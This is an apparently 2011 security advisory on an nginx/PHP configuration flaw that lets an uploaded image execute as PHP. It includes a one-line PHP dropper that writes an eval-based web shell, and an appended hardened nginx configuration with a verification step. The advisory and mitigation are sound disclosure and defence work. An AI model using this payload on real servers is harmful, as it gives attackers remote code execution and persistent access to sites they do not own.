# Exploit Title : Nginx Server Configuration hole ; Upload file execute
# Software link : http://nginx.org/
# Version : Confirmed in nginx v0.7.65. (And PHP v5.3.2 with Suhosin patch and extension).
# Tested on : windows 7
# Date : 29/07/2011
# Author : sysmox.com
# Website : http://www.sysmox.com
# Email : info_at_sysmox.com
Millions of sites run the Nginx project; I like it too. It has excellent options, and it has recently become popular because of the workload it handles and the active development of its code.

Nginx suffers from a widespread flaw that could cause serious damage and be exploited by malicious hackers to gain access to the affected system:

If your configuration sets up nginx+php+cgi like this:
```nginx
location ~ \.php$ {
    root html;
    fastcgi_pass 127.0.0.1:9000;
    fastcgi_index index.php;
    fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
    include fastcgi_params;
}
```
If a user browses to, for example, http://www.site.com/sys.php, the link would be /sys.jpg/sys.php.

SCRIPT_FILENAME would become /scripts/sys.jpg and PATH_INFO would become sys.php. That means that if somebody uploaded a jpg file, they could execute it as PHP.

The contents of the jpg file can be something like:

```php
<?fputs(fopen(shell.PHP,w),<?eval(\$_POST[akt]);?>)?>
```
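The following configuration is an added example and is not part of the original advisory: it places the vulnerable `location` block from above beside a hardened form. The document root `/var/www/html` and the `/uploads/` directory are assumptions; the behaviour depends on PHP's `cgi.fix_pathinfo` setting, which is why the hardened block does not trust PHP's own path resolution at all.

```nginx
# Vulnerable pattern (as in the advisory): every URI ending in .php is handed to
# PHP-FPM without checking that the script exists. With cgi.fix_pathinfo=1 PHP
# walks /scripts/sys.jpg/sys.php back to /scripts/sys.jpg and executes the
# uploaded image as PHP.
location ~ \.php$ {
    root html;
    fastcgi_pass 127.0.0.1:9000;
    fastcgi_index index.php;
    fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
    include fastcgi_params;
}

# Hardened replacement. Regex locations are matched in order of appearance,
# so the upload-directory deny must come before the generic PHP handler.

# 1. Never execute anything under the upload directory, whatever it is named
#    (directory path is an assumption for this example).
location ~* ^/uploads/.*\.php {
    return 403;
}

location ~ \.php$ {
    root /var/www/html;                   # assumed document root

    # 2. Refuse the request unless the exact URI maps to an existing file, so
    #    /uploads/sys.jpg/sys.php is answered with 404 before PHP is involved.
    try_files $uri =404;

    # 3. Split script name and trailing path info explicitly in nginx, so
    #    SCRIPT_FILENAME can only ever point at a .php file and PATH_INFO is
    #    passed separately instead of being guessed by PHP.
    fastcgi_split_path_info ^(.+\.php)(/.+)$;

    fastcgi_pass 127.0.0.1:9000;
    fastcgi_index index.php;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    fastcgi_param PATH_INFO $fastcgi_path_info;
    include fastcgi_params;
}

# 4. Defence in depth on the PHP side (php.ini, not nginx):
#        cgi.fix_pathinfo=0
#    With this set, PHP refuses to execute a script whose SCRIPT_FILENAME does
#    not exist instead of searching backwards along the path.
```

A quick check after deploying: request `/uploads/<any existing image>/x.php` and confirm the response is 403 or 404 rather than the image being interpreted by PHP; the `try_files` line alone already closes the hole described in the advisory, the other measures limit the blast radius if that line is ever removed.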